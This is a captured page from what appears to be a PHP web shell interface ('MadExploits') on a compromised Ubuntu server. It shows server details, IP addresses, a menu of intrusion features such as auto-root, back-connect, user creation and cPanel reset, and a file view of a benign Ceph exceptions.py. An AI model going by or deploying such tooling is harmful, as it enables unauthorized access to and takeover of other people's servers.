Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
snap /
lxd /
31333 /
lib /
python3 /
dist-packages /
ceph /
[ HOME SHELL ]
Name
Size
Permission
Action
deployment
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
__init__.py
0
B
-rw-r--r--
exceptions.py
1.8
KB
-rw-r--r--
utils.py
3.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : exceptions.py
class Error(Exception): """ `Error` class, derived from `Exception` """ def __init__(self, message, errno=None): super(Exception, self).__init__(message) self.errno = errno def __str__(self): msg = super(Exception, self).__str__() if self.errno is None: return msg return '[errno {0}] {1}'.format(self.errno, msg) class InvalidArgumentError(Error): pass class OSError(Error): """ `OSError` class, derived from `Error` """ pass class InterruptedOrTimeoutError(OSError): """ `InterruptedOrTimeoutError` class, derived from `OSError` """ pass class PermissionError(OSError): """ `PermissionError` class, derived from `OSError` """ pass class PermissionDeniedError(OSError): """ deal with EACCES related. """ pass class ObjectNotFound(OSError): """ `ObjectNotFound` class, derived from `OSError` """ pass class NoData(OSError): """ `NoData` class, derived from `OSError` """ pass class ObjectExists(OSError): """ `ObjectExists` class, derived from `OSError` """ pass class ObjectBusy(OSError): """ `ObjectBusy` class, derived from `IOError` """ pass class IOError(OSError): """ `ObjectBusy` class, derived from `OSError` """ pass class NoSpace(OSError): """ `NoSpace` class, derived from `OSError` """ pass class RadosStateError(Error): """ `RadosStateError` class, derived from `Error` """ pass class IoctxStateError(Error): """ `IoctxStateError` class, derived from `Error` """ pass class ObjectStateError(Error): """ `ObjectStateError` class, derived from `Error` """ pass class LogicError(Error): """ `` class, derived from `Error` """ pass class TimedOut(OSError): """ `TimedOut` class, derived from `OSError` """ pass
Close